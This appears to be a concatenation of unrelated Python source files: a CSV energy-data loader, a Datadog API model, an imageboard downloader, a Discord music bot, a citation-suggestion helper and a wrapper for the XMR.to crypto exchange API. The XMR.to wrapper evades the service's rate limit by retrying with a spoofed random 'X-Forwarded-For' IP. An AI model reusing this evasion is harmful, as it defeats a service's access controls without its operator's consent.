raise Exception("Parsed the wrong number of columns on line {} of the SM file "
"('{}').".format(i, filename))
install_date = datetime.strptime(row[12], "%d-%m-%Y").date() if row[12] != "" else np.nan
capacity = float(row[2]) if self.isNumber(row[2]) else np.nan
data.append([row[0], capacity, row[4], row[10], row[11], install_date, row[-1]])
df = pd.DataFrame(np.array(data), columns=["ID", "Capacity", "Postcode", "Eastings", "Northings",
"Install Date", "Funding"])
df.sort_values(by="Capacity", inplace=True, ascending=False)
df["Source"] = "SM"
return df
def load_EL(self):
"""
Loads Electralink csv file
ID, capacity, postcode, install_date
"""
data = []
with io.open(self.EL_file, "rt", newline="\r\n") as fid:
next(fid)
i = 1
for line in fid:
i += 1
line = re.sub(r'"[^"]*"', lambda m: m.group(0).replace(",", ";"), line)
row = line.strip().split(",")
if len(row) == 1:
print("row of length 1")
continue
if len(row) != 14:
raise Exception("Parsed the wrong number of columns on line {} of the EL file "
"('{}').".format(i, filename))
postcode = row[4] if row[4]!="" else np.nan
capacity = float(row[6]) / 1000. if self.isNumber(row[6]) else np.nan
earliest_gen_date = datetime.strptime(row[7], "%Y-%m-%d").date() if row[7] != "" else np.nan
ro_repd_gen_date = datetime.strptime(row[8], "%Y-%m-%d").date() if row[8] != "" else np.nan
lat = float(row[9]) / 1000. if self.isNumber(row[9]) else np.nan
lon = float(row[10]) / 1000. if self.isNumber(row[10]) else np.nan
this_data = [row[0].strip(), capacity, postcode, earliest_gen_date,
ro_repd_gen_date, lat, lon]
if this_data not in data:
data.append(this_data)
df = pd.DataFrame(np.array(data), columns=["ID", "Capacity", "Postcode",
"Earliest Gen Date", "RO/REPD Start Date",
"Lat", "Lon"])
df.sort_values(by="Capacity", inplace=True, ascending=False)
df["Source"] = "EL"
return df
# def upload_SL_to_db(self):
@staticmethod
def isNumber(x):
"""
number check
"""
try:
float(x)
return True
except ValueError:
return False
def myprint(self, msg, time_section=None):
"""
Use this function to print updates unless class attribute quiet is set to True.
Parameters
----------
`msg` : str
The message to be printed.
`time_section`: str
A command to specify whether timing should "start" or "stop".
"""
if not self.quiet:
if time_section == "stop":
msg += " ({:.2f} seconds)".format(TIME.time() - self.timer)
print(msg)
if time_section == "start":
self.timer = TIME.time()
def print_progress(iteration, total, prefix='', suffix='', decimals=2, bar_length=100):
"""
Call in a loop to create terminal progress bar.
Parameters
----------
`iteration` : int
current iteration (required)
`total` : int
total iterations (required)
`prefix` : string
prefix string (optional)
`suffix` : string
suffix string (optional)
`decimals` : int
number of decimals in percent complete (optional)
`bar_length` : int
character length of bar (optional)
Notes
-----
Taken from `Stack Overflow <http://stackoverflow.com/a/34325723>`_.
"""
filled_length = int(round(bar_length * iteration / float(total)))
percents = round(100.00 * (iteration / float(total)), decimals)
progress_bar = '#' * filled_length + '-' * (bar_length - filled_length)
sys.stdout.write('\r%s |%s| %s%s %s' % (prefix, progress_bar, percents, '%', suffix))
sys.stdout.flush()
if iteration == total:
sys.stdout.write('\n')
sys.stdout.flush()
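# Minimal usage sketch for print_progress (hypothetical loop):
#   for i, item in enumerate(items, start=1):
#       process(item)
#       print_progress(i, len(items), prefix='Processing', bar_length=40)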
if __name__ == "__main__":
main() |
the-stack_106_30660 | # Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License.
# This product includes software developed at Datadog (https://www.datadoghq.com/).
# Copyright 2019-Present Datadog, Inc.
import re # noqa: F401
import sys # noqa: F401
from datadog_api_client.v1.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
class UsageAnalyzedLogsHour(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {}
validations = {}
additional_properties_type = None
_nullable = False
@cached_property
def openapi_types():
"""
This must be a method because a model may have properties that are
of type self, this must run after the class is loaded
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
"analyzed_logs": (int,), # noqa: E501
"hour": (datetime,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
"analyzed_logs": "analyzed_logs", # noqa: E501
"hour": "hour", # noqa: E501
}
_composed_schemas = {}
required_properties = set(
[
"_data_store",
"_check_type",
"_spec_property_naming",
"_path_to_item",
"_configuration",
"_visited_composed_classes",
]
)
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs): # noqa: E501
"""UsageAnalyzedLogsHour - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
When traveling through a discriminator, the
composed schema that is
is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
analyzed_logs (int): Contains the number of analyzed logs.. [optional] # noqa: E501
hour (datetime): The hour for the usage.. [optional] # noqa: E501
"""
_check_type = kwargs.pop("_check_type", True)
_spec_property_naming = kwargs.pop("_spec_property_naming", False)
_path_to_item = kwargs.pop("_path_to_item", ())
_configuration = kwargs.pop("_configuration", None)
_visited_composed_classes = kwargs.pop("_visited_composed_classes", ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments."
% (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if (
var_name not in self.attribute_map
and self._configuration is not None
and self._configuration.discard_unknown_keys
and self.additional_properties_type is None
):
# discard variable.
continue
setattr(self, var_name, var_value)
|
the-stack_106_30661 | # Python 4chan Downloader
import argparse
import os
import re
import time
import wget
from straight.plugin import load
from plugins.ChanParserInterface import ChanParserInterface
from datetime import datetime
class PFourChanDL(object):
def __init__(self):
self.params = None
def main(self):
# Parsing arguments
argparser = argparse.ArgumentParser(description="Download files from 4chan and other imageboards")
argparser.add_argument('--min_space', type=int, default=1,
help="Minimum empty space in disk to download, in GB")
argparser.add_argument('-i', '--imageboard', type=str, default="4chan", help="Imageboard to download from")
argparser.add_argument('-t', '--thread', type=str)
argparser.add_argument('-b', '--board', type=str)
argparser.add_argument('-o', '--output', type=str, default="./")
argparser.add_argument('-a', '--board_archive', dest='board_archive', action='store_true', default=False,
help="Define if must download the board archive too")
argparser.add_argument('-p', '--save_page', dest='save_page', action='store_true', default=False,
help="Define if the html page of the thread will be saved too")
self.params = argparser.parse_args()
plugin_instances = load("plugins", subclasses=ChanParserInterface).produce()
parser = None
for plugin in plugin_instances:
if plugin.its_me(self.params.imageboard):
parser = plugin
if parser is None:
print(self.params.imageboard, "imageboard support not implemented yet!")
quit()
else:
print(parser.__class__.__name__, "selected")
if self.params.thread is not None:
board_name, thread_title, links = parser.parse_thread(self.params.thread)
self.download_thread_files(board_name, thread_title, links)
elif self.params.board is not None:
threads = parser.parse_board(self.params.board, self.params.board_archive)
count = 0
total = len(threads)
for thread in threads:
count = count + 1
print("({}/{}) - Download {}".format(count, total, thread))
board_name, thread_title, links = parser.parse_thread(thread)
self.download_thread_files(board_name, thread_title, links)
print("OK! Files downloaded.")
def download_thread_files(self, board_name, thread_title, links):
dest_directory = "{}{}/{}".format(self.params.output,
self.get_valid_filename(board_name),
self.get_valid_filename(thread_title))
print("Destination:", dest_directory)
if not os.path.exists(dest_directory):
os.makedirs(dest_directory)
count = 0
total = len(links)
for link in links:
count = count + 1
print("({}/{})".format(count, total))
self.download_file(link, dest_directory)
time.sleep(0.05)
@staticmethod
def download_file(url, dest_directory):
dest_filename = "{}/{}".format(dest_directory, wget.filename_from_url(url))
if os.path.exists(dest_filename):
print(datetime.now().strftime("%d/%m/%Y %H:%M:%S"), "- Already downloaded file ", dest_filename)
return
print(datetime.now().strftime("%d/%m/%Y %H:%M:%S"), "- Downloading file ", dest_filename)
try:
wget.download(url, dest_filename)
print()
except:
print(datetime.now().strftime("%d/%m/%Y %H:%M:%S"), "- Error downloading file ", dest_filename)
"""Make filename Windows-safe"""
@staticmethod
def get_valid_filename(s):
s = str(s).strip().replace(' ', '_')
return re.sub(r'(?u)[^-\w.]', '-', s)
|
the-stack_106_30662 | import discord
from discord.ext import commands
#import youtube_dl
import os
from pytube import YouTube
token = open("token.txt", "r").read()
mainaccid=open("mainaccid.txt", "r").read()
bot = commands.Bot(command_prefix='!joker ')
@bot.event
async def on_ready():
print('We have logged in as {0.user}'.format(bot))
@bot.command()
async def play(ctx, url : str):
## song_there = os.path.isfile(r"C:\Users\user\Desktop\discord bot\song.mp4")
## try:
## if song_there:
## os.remove(r"C:\Users\user\Desktop\discord bot\song.mp4")
## except PermissionError:
## await ctx.send("Wait for the current playing music to end or use the 'stop' command :negative_squared_cross_mark:")
## return
try:
voiceChannel = discord.utils.get(ctx.guild.voice_channels, name=str(ctx.message.author.voice.channel))
await voiceChannel.connect()
await ctx.send("Joined "+str(ctx.message.author.voice.channel)+" voice channel!:white_check_mark:")
voice = discord.utils.get(bot.voice_clients, guild=ctx.guild)
except AttributeError:
await ctx.send(ctx.message.author.mention+" is not in any voice channel :negative_squared_cross_mark:")
return
except:
await ctx.send(ctx.message.author.mention+" joker in another voice channel of this server \n Cannot be in two voice channels simultaneously :negative_squared_cross_mark:")
## ydl_opts = {
## 'format': 'bestaudio/best',
## 'postprocessors': [{
## 'key': 'FFmpegExtractAudio',
## 'preferredcodec': 'mp3',
## 'preferredquality': '192',
## }],
## }
## with youtube_dl.YoutubeDL(ydl_opts) as ydl:
## ydl.download([url])
yt=YouTube(str(url))
yt_embed=discord.Embed(title=yt.title+":musical_note:",description=yt.description,color=discord.Colour.red())
yt_embed.set_thumbnail(url=yt.thumbnail_url)
yt_embed.add_field(name="Author: ",value=yt.author+":musical_score: ",inline=False)
yt_embed.add_field(name="Duration: ",value=str(yt.length)+" seconds :clock3: ",inline=False)
yt_embed.add_field(name="Publish date: ",value=str(yt.publish_date)+":calendar_spiral:",inline=False)
yt_embed.add_field(name="Rating: ",value=str(yt.rating)+":star2:",inline=False)
yt_embed.add_field(name="Views: ",value=str(yt.views)+":eyes:",inline=False)
t=yt.streams.filter(only_audio=True)
t[0].download(r"C:\Users\user\Desktop\discord bot")
## for file in os.listdir("./"):
## if file.endswith(".mp4"):
## os.rename(file, r"C:\Users\user\Desktop\discord bot\song.mp4")
voice.play(discord.FFmpegPCMAudio(yt.title+".mp4"))
await ctx.send("Playing "+yt.title+" :loud_sound:")
await ctx.send(embed=yt_embed)
@bot.command(aliases=["disconnect","exit"])
async def leave(ctx):
voice = discord.utils.get(bot.voice_clients, guild=ctx.guild)
if voice.is_connected():
await voice.disconnect()
await ctx.send("Disconnected :wave:")
else:
await ctx.send("The bot is not connected to a voice channel. :negative_squared_cross_mark:")
@bot.command()
async def pause(ctx):
voice = discord.utils.get(bot.voice_clients, guild=ctx.guild)
if voice.is_playing():
voice.pause()
await ctx.send("Paused :pause_button:")
else:
await ctx.send("Currently no audio is playing. :negative_squared_cross_mark:")
@bot.command()
async def resume(ctx):
voice = discord.utils.get(bot.voice_clients, guild=ctx.guild)
if voice.is_paused():
voice.resume()
await ctx.send("Resumed :play_pause: ")
else:
await ctx.send("The audio is not paused. :negative_squared_cross_mark:")
@bot.command()
async def stop(ctx):
voice = discord.utils.get(bot.voice_clients, guild=ctx.guild)
voice.stop()
await ctx.send("Stopped playing :octagonal_sign: ")
bot.run(token)
|
the-stack_106_30663 | '''
Created on Nov 1, 2014
@author: ehenneken
'''
from __future__ import absolute_import
# general module imports
import sys
import os
import operator
from itertools import groupby
from flask import current_app
from .utils import get_data
from .utils import get_meta_data
__all__ = ['get_suggestions']
def get_suggestions(**args):
# initializations
papers = []
bibcodes = []
if 'bibcodes' in args:
bibcodes = args['bibcodes']
if len(bibcodes) == 0:
return []
# Any overrides for default values?
Nsuggestions = current_app.config.get('CITATION_HELPER_NUMBER_SUGGESTIONS')
# get rid of potential trailing spaces
bibcodes = [a.strip() for a in bibcodes][
:current_app.config.get('CITATION_HELPER_MAX_INPUT')]
# start processing
# get the citations for all publications (keeping multiplicity is
# essential)
papers = get_data(bibcodes=bibcodes)
if "Error" in papers:
return papers
# removes papers from the original list to get candidates
papers = [a for a in papers if a not in bibcodes]
# establish frequencies of papers in results
paperFreq = [(k, len(list(g))) for k, g in groupby(sorted(papers))]
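    # e.g. (hypothetical bibcodes) papers == ['A', 'B', 'A'] gives paperFreq == [('A', 2), ('B', 1)]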
# and sort them, most frequent first
paperFreq = sorted(paperFreq, key=operator.itemgetter(1), reverse=True)
# remove all papers with frequencies smaller than threshold
paperFreq = [a for a in paperFreq if a[1] > current_app.config.get(
'CITATION_HELPER_THRESHOLD_FREQUENCY')]
# get metadata for suggestions
meta_dict = get_meta_data(results=paperFreq[:Nsuggestions])
if "Error"in meta_dict:
return meta_dict
# return results in required format
return [{'bibcode': x, 'score': y, 'title': meta_dict[x]['title'],
'author':meta_dict[x]['author']} for (x, y) in
paperFreq[:Nsuggestions] if x in meta_dict.keys()]
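# Illustrative usage sketch (not part of the original module). It assumes an
# active Flask application context so that current_app.config is populated;
# the bibcodes are made-up examples:
#
#     with app.app_context():
#         suggestions = get_suggestions(bibcodes=["2019ApJ...123..456A",
#                                                 "2020MNRAS.500..789B"])
#         # -> [{'bibcode': ..., 'score': ..., 'title': ..., 'author': ...}, ...]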
|
the-stack_106_30666 | #!/usr/bin/env python
"""
Goal:
* Interact with XMR.to.
xmrto_wrapper create-order --destination 3K1jSVxYqzqj7c9oLKXC7uJnwgACuTEZrY --btc-amount 0.001
How to:
* General usage
- `xmrto_wrapper create-order --destination 3K1jSVxYqzqj7c9oLKXC7uJnwgACuTEZrY --btc-amount 0.001`
      - `xmrto_wrapper create-order --destination 3K1jSVxYqzqj7c9oLKXC7uJnwgACuTEZrY --btc-amount 0.001 --follow`
- `xmrto_wrapper track-order --secret-key xmrto-ebmA9q`
      - `xmrto_wrapper track-order --secret-key xmrto-ebmA9q --follow`
- `xmrto_wrapper check-price --btc-amount 0.01`
- `xmrto_wrapper parameters`
- `xmrto_wrapper qrcode --data "something"`
* Get help
- xmrto_wrapper -h
* You can
- Create an order: `xmrto_wrapper create-order`
- Track an order: `xmrto_wrapper track-order`
      - Get a recent price: `xmrto_wrapper check-price`
- Create a QR code: `xmrto_wrapper qrcode`
* The default API used is `--api v3`, so no need to actually set that parameter.
* The default URL used is `--url https://xmr.to`, so no need to actually set that parameter.
When run as a script (`xmrto_wrapper ...`), configure it using CLI options.
When imported as a module (`import xmrto_wrapper`), environment variables are used for configuration.
XMR.to HTTP errors and status codes;
* https://xmrto-api.readthedocs.io/en/latest/
"""
import os
import sys
import argparse
import logging
import json
import time
import collections
import re
from typing import List, Dict
from dataclasses import dataclass
from types import SimpleNamespace
import urllib.parse as urlparse
from requests import Session, codes
from requests.adapters import HTTPAdapter
from requests.exceptions import ConnectionError, SSLError, RequestException
from .rand_ip import get_random_ip_address
logging.basicConfig()
logger = logging.getLogger("XmrtoWrapper")
logger.setLevel(logging.INFO)
API_VERSIONS_ = {
"v3": "v3",
}
API_VERSIONS = SimpleNamespace(**API_VERSIONS_)
XMRTO_URL_DEFAULT = "https://xmr.to"
API_VERSION_DEFAULT = API_VERSIONS.v3
XMRTO_URL = os.environ.get("XMRTO_URL", XMRTO_URL_DEFAULT)
API_VERSION = os.environ.get("API_VERSION", API_VERSION_DEFAULT)
DESTINATION_ADDRESS = os.environ.get("BTC_ADDRESS", None)
LN_INVOICE = os.environ.get("LN_INVOICE", None)
BTC_AMOUNT = os.environ.get("BTC_AMOUNT", None)
XMR_AMOUNT = os.environ.get("XMR_AMOUNT", None)
CERTIFICATE = os.environ.get("XMRTO_CERTIFICATE", None)
QR_DATA = os.environ.get("QR_DATA", None)
SECRET_KEY = os.environ.get("SECRET_KEY", None)
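# The *Attributes dataclasses below map this wrapper's field names to the JSON
# keys returned by the XMR.to API; the corresponding Status/Order/Price/Parameters
# dataclasses hold the parsed values for a given API version.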
@dataclass
class StatusAttributes:
state: str = "state"
out_amount: str = "btc_amount"
out_amount_partial: str = "btc_amount_partial"
out_address: str = "btc_dest_address"
seconds_till_timeout: str = "seconds_till_timeout"
created_at: str = "created_at"
# Difference between API versions.
in_out_rate: str = "xmr_price_btc"
payment_subaddress: str = "xmr_receiving_subaddress"
in_amount: str = "xmr_amount_total"
in_amount_remaining: str = "xmr_amount_remaining"
in_confirmations_remaining: str = "xmr_num_confirmations_remaining"
# @dataclass
# class StatusAttributesV2(StatusAttributes):
# # Only with API v2.
# payment_address: str = "xmr_receiving_address"
# payment_integrated_address: str = "xmr_receiving_integrated_address"
# payment_id_long: str = "xmr_required_payment_id_long"
# payment_id_short: str = "xmr_required_payment_id_short"
@dataclass
class StatusAttributesV3(StatusAttributes):
in_out_rate: str = "incoming_price_btc"
payment_subaddress: str = "receiving_subaddress"
in_amount: str = "incoming_amount_total"
in_amount_remaining: str = "remaining_amount_incoming"
in_confirmations_remaining: str = "incoming_num_confirmations_remaining"
# Only with API v3.
uses_lightning: str = "uses_lightning"
payments: str = "payments"
@dataclass
class Status:
state: str = ""
out_amount: float = 0.0
out_amount_partial: float = 0.0
out_address: str = ""
seconds_till_timeout: int = 0
created_at: str = ""
# Difference between API versions.
in_out_rate: float = 0.0
payment_subaddress: str = ""
in_amount: float = 0.0
in_amount_remaining: float = 0.0
in_confirmations_remaining: int = 0
# @dataclass
# class StatusV2(Status):
# # Only with API v2.
# payment_address: str = ""
# payment_integrated_address: str = ""
# payment_id_long: str = ""
# payment_id_short: str = ""
# attributes = StatusAttributesV2()
@dataclass
class StatusV3(Status):
out_amount: str = "0.0"
out_amount_partial: str = "0.0"
in_out_rate: str = "0.0"
in_amount: str = "0.0"
in_amount_remaining: str = "0.0"
uses_lightning: bool = False
payments: List[Dict] = None
attributes = StatusAttributesV3()
@dataclass
class OrderAttributes:
uuid: str = "uuid"
state: str = "state"
out_address: str = "btc_dest_address"
out_amount: str = "btc_amount"
@dataclass
class OrderAttributesV3(OrderAttributes):
# Only with API v3.
uses_lightning: str = "uses_lightning"
@dataclass
class Order:
uuid: str = ""
state: str = ""
out_amount: float = 0.0
out_address: str = ""
# @dataclass
# class OrderV2(Order):
# attributes = OrderAttributes()
@dataclass
class OrderV3(Order):
uses_lightning: bool = False
attributes = OrderAttributesV3()
PRICE_FIELDS = ("out_amount", "in_amount", "in_out_rate")
Price = collections.namedtuple("Price", PRICE_FIELDS)
@dataclass
class PriceAttributes:
out_amount: str = "btc_amount"
# @dataclass
# class PriceAttributesV2(PriceAttributes):
# in_amount: str = "xmr_amount_total"
# in_out_rate: str = "xmr_price_btc"
# in_num_confirmations_remaining: str = "xmr_num_confirmations_remaining"
@dataclass
class PriceAttributesV3(PriceAttributes):
in_amount: str = "incoming_amount_total"
in_out_rate: str = "incoming_price_btc"
in_num_confirmations_remaining: str = (
"incoming_num_confirmations_remaining"
)
@dataclass
class Price:
def _to_json(self):
data = {PriceAttributes.out_amount: self.out_amount}
return data
def __str__(self):
return json.dumps(self._to_json())
# @dataclass
# class PriceV2(Price):
# out_amount: float = 0.0
# in_amount: float = 0.0
# in_out_rate: float = 0.0
# in_num_confirmations_remaining: int = -1
# attributes = PriceAttributesV2()
#
# def _to_json(self):
# data = super()._to_json()
# data.update({PriceAttributesV2.in_amount: self.in_amount})
# data.update({PriceAttributesV2.in_out_rate: self.in_out_rate})
# data.update(
# {
# PriceAttributesV2.in_num_confirmations_remaining: self.in_num_confirmations_remaining
# }
# )
# return data
#
# def __str__(self):
# return json.dumps(self._to_json())
@dataclass
class PriceV3(Price):
out_amount: str = "0.0"
    in_amount: str = "0.0"
in_out_rate: str = "0.0"
in_num_confirmations_remaining: int = -1
attributes = PriceAttributesV3()
def _to_json(self):
data = super()._to_json()
data.update({PriceAttributesV3.in_amount: self.in_amount})
data.update({PriceAttributesV3.in_out_rate: self.in_out_rate})
data.update(
{
PriceAttributesV3.in_num_confirmations_remaining: self.in_num_confirmations_remaining
}
)
return data
def __str__(self):
return json.dumps(self._to_json())
@dataclass
class RoutesAttributes:
num_routes: str = "num_routes"
success_probability: str = "success_probability"
@dataclass
class Routes:
num_routes: int = 0
success_probability: float = 0.0
attributes = RoutesAttributes()
@dataclass
class ParametersAttributes:
price: str = "price"
upper_limit: str = "upper_limit"
lower_limit: str = "lower_limit"
zero_conf_max_amount: str = "zero_conf_max_amount"
    zero_conf_enabled: str = "zero_conf_enabled"
# @dataclass
# class ParametersAttributesV2(ParametersAttributes):
# pass
@dataclass
class ParametersAttributesV3(ParametersAttributes):
ln_upper_limit: str = "ln_upper_limit"
ln_lower_limit: str = "ln_lower_limit"
@dataclass
class Parameters:
zero_conf_enabled: bool = False
def _to_json(self):
data = {ParametersAttributes.zero_conf_enabled: self.zero_conf_enabled}
return data
def __str__(self):
return json.dumps(self._to_json())
# @dataclass
# class ParametersV2(Parameters):
# price: float = 0.0
# upper_limit: float = 0.0
# lower_limit: float = 0.0
# zero_conf_max_amount: float = 0.0
# attributes = ParametersAttributesV2()
#
# def _to_json(self):
# data = super()._to_json()
# data.update({ParametersAttributesV2.price: self.price})
# data.update({ParametersAttributesV2.upper_limit: self.upper_limit})
# data.update({ParametersAttributesV2.lower_limit: self.lower_limit})
# data.update(
# {
# ParametersAttributesV2.zero_conf_max_amount: self.zero_conf_max_amount
# }
# )
# return data
#
# def __str__(self):
# return json.dumps(self._to_json())
@dataclass
class ParametersV3(Parameters):
price: str = "0.0"
upper_limit: str = "0.0"
lower_limit: str = "0.0"
ln_upper_limit: str = "0.0"
ln_lower_limit: str = "0.0"
zero_conf_max_amount: str = "0.0"
attributes = ParametersAttributesV3()
def _to_json(self):
data = super()._to_json()
data.update({ParametersAttributesV3.price: self.price})
data.update({ParametersAttributesV3.upper_limit: self.upper_limit})
data.update({ParametersAttributesV3.lower_limit: self.lower_limit})
data.update(
{ParametersAttributesV3.ln_upper_limit: self.ln_upper_limit}
)
data.update(
{ParametersAttributesV3.ln_lower_limit: self.ln_lower_limit}
)
data.update(
{
ParametersAttributesV3.zero_conf_max_amount: self.zero_conf_max_amount
}
)
return data
def __str__(self):
return json.dumps(self._to_json())
# PARAMETERS_FIELDS = ("price", "upper_limit", "lower_limit", "ln_upper_limit", "ln_lower_limit", "zero_conf_enabled", "zero_conf_max_amount")
# Parameters = collections.namedtuple("Parameters", PARAMETERS_FIELDS)
class XmrtoConnection:
USER_AGENT = "XmrtoProxy/0.1"
HTTP_TIMEOUT = 30
MAX_RETRIES = 3
retry_adapter = HTTPAdapter(max_retries=MAX_RETRIES)
def __init__(self, url="", connection=None, timeout: int = HTTP_TIMEOUT):
self.__url = ""
self.__timeout = timeout
if connection:
logger.debug("Use existing session.")
self.__conn = connection
else:
logger.debug("Create new session.")
self.__url = urlparse.urlparse(url)
headers = {
"Content-Type": "application/json",
"User-Agent": self.USER_AGENT,
"Host": self.__url.hostname,
}
self.__conn = Session()
self.__conn.mount(
f"{self.__url.scheme}://{self.__url.hostname}",
self.retry_adapter,
)
self.__conn.headers = headers
def get_connection(self):
return self.__conn
def get_hostname(self):
return self.__url.hostname
def get(self, url: str, expect_json=True):
return self._request(url=url, func=self._get, expect_json=expect_json)
def _get(self, url: str, **kwargs):
return self.__conn.get(url=url, timeout=self.__timeout, **kwargs)
def post(
self,
url: str,
postdata: Dict[str, str],
expect_json=True,
expect_response=True,
):
return self._request(
url=url,
func=self._post,
postdata=postdata,
expect_json=expect_json,
expect_response=expect_response,
)
def _post(self, url: str, postdata: str, **kwargs):
logger.debug(f"--> POSTDATA: {postdata}.")
logger.debug(f"--> Additional request arguments: '{kwargs}'.")
return self.__conn.post(
url=url,
data=postdata,
timeout=self.__timeout,
**kwargs, # , allow_redirects=False
)
def _request(
self,
url: str,
func,
postdata: Dict[str, str] = None,
expect_json=True,
expect_response=True,
):
"""Makes the HTTP request"""
url = url.lower()
if url.find("localhost") < 0:
schema = re.compile("http[s]?://")
if not schema.match(
url
            ):  # 'match' starts at the beginning of the line.
url = "https://" + url
http = re.compile("http://")
            if http.match(url):  # 'match' starts at the beginning of the line.
url = url.replace("http", "https")
logger.debug(f"--> URL: {url}")
response = None
retries = 10
try:
try:
data = {"url": url}
if postdata:
data["postdata"] = json.dumps(postdata)
while retries > 0:
# Get around endpoint rate limit
# by setting a random IP in 'X-Forwarded-For'.
# Naive approach.
if (
response is not None
and response.status_code == codes.forbidden
):
logger.info(f"[{retries}] Rate limited, trying again.")
retries -= 1
random_ip = get_random_ip_address()
# 'X-Forwarded-For' is added
# in addition to the session headers.
# https://requests.readthedocs.io/en/master/user/advanced/
data["headers"] = {"X-Forwarded-For": random_ip}
response = func(**data)
logger.debug(f"--> METHOD: {response.request.method}.")
logger.debug(
f"--> REQUEST HEADERS: {response.request.headers}."
)
logger.debug(f"<-- STATUS CODE: {response.status_code}.")
                    logger.debug(f"<-- RESPONSE HEADERS: {response.headers}.")
if response.status_code != codes.forbidden:
retries = 0
except (SSLError) as e:
# Disable verification: verify=False
# , cert=path_to_certificate
# , verify=True
logger.debug(
f"Trying certificate: '{CERTIFICATE}'. SSL certificate error '{str(e)}'."
)
data["cert"] = CERTIFICATE
data["verify"] = True
response = func(**data)
except (ConnectionError) as e:
logger.debug(f"Connection error: {str(e)}.")
error_msg = {"error": str(e)}
error_msg["url"] = url
error_msg["error_code"] = 102
logger.error(json.dumps(error_msg))
return error_msg
except (RequestException) as e:
logger.debug(f"Request error: {str(e)}.")
error_msg = {"error": str(e)}
error_msg["url"] = url
error_msg["error_code"] = 104
logger.error(json.dumps(error_msg))
return error_msg
except (Exception) as e:
logger.debug(f"Error: {str(e)}.")
error_msg = {"error": str(e)}
error_msg["url"] = url
error_msg["error_code"] = 103
logger.error(json.dumps(error_msg))
return error_msg
response_ = None
try:
response_ = self._get_response(
response=response, expect_json=expect_json
)
except (ValueError) as e:
logger.debug(f"Error: {str(e)}.")
error_msg = {"error": json.loads(str(e))}
error_msg["url"] = url
error_msg["error_code"] = 100
logger.error(f"Response error: {json.dumps(error_msg)}.")
return error_msg
if not response_:
if expect_response:
error_msg = {"error": "Could not evaluate response."}
error_msg["url"] = url
error_msg["error_code"] = 101
logger.error(f"No response: {json.dumps(error_msg)}.")
else:
error_msg = {}
logger.debug(
f"No response: {json.dumps(error_msg)}. No response expected, ignored."
)
return error_msg
elif isinstance(response_, dict) and (
not response_.get("error", None) is None
):
error_msg = response_
error_msg["url"] = url
logger.error(f"API error: {json.dumps(error_msg)}.")
return error_msg
return response_
def _get_response(self, response, expect_json=True):
"""Evaluate HTTP request response
:return: Either JSON response or response object in case of PNG (QRCode)
"""
json_response = None
# Compare against None
# Response with 400 status code returns True for not response
if response is None:
json_response = {
"error": "No response.",
"error_msg": f"Response is {response}.",
}
if not json_response:
# Error codes used by the API, returning API errors.
if response.status_code not in (
codes.ok,
codes.created, # Order created.
codes.bad, # Invalid post parameters.
codes.forbidden, # Rate limit.
codes.not_found, # Order not found.
):
json_response = {
"error": "HTTP status code.",
"error_msg": f"Received HTTP status code: {response.status_code}.",
}
if not json_response:
http_response = response.text
if http_response is None:
json_response = {
"error": "Empty response.",
"error_msg": "Missing HTTP response from server.",
}
if not json_response:
try:
json_response = response.json()
except (json.decoder.JSONDecodeError) as e:
if expect_json:
if response.status_code in (
codes.not_found, # General 'not found', e.g. API endpoint not found.
):
json_response = {
"error": "HTTP status code.",
"error_msg": f"Received HTTP status code: {response.status_code}.",
}
else:
json_response = {
"error": "Expected JSON, got something else.",
"error_msg": str(e),
"response": http_response,
}
else:
return http_response
logger.debug(f"<-- {json_response}")
return json_response
class CreateOrder:
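    # Translates the JSON body of an order-creation response into the Order
    # dataclass for the selected API version; returns (order, error), where
    # error carries the raw error payload and order is None when there is no
    # data to parse.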
api_classes = {API_VERSIONS.v3: OrderV3}
@classmethod
def get(cls, data, api):
xmrto_error = None
if data and "error" in data:
xmrto_error = data
order_ = cls.api_classes[api]
if not order_ or data is None:
return None, xmrto_error
order = order_()
order.uuid = data.get(order.attributes.uuid, None)
order.state = data.get(order.attributes.state, None)
order.out_address = data.get(order.attributes.out_address, None)
order.out_amount = data.get(order.attributes.out_amount, None)
if api == API_VERSIONS.v3:
order.uses_lightning = data.get(
order.attributes.uses_lightning, None
)
return order, xmrto_error
class OrderStatus:
api_classes = {API_VERSIONS.v3: StatusV3}
@classmethod
def get(cls, data, api):
xmrto_error = None
if data and "error" in data:
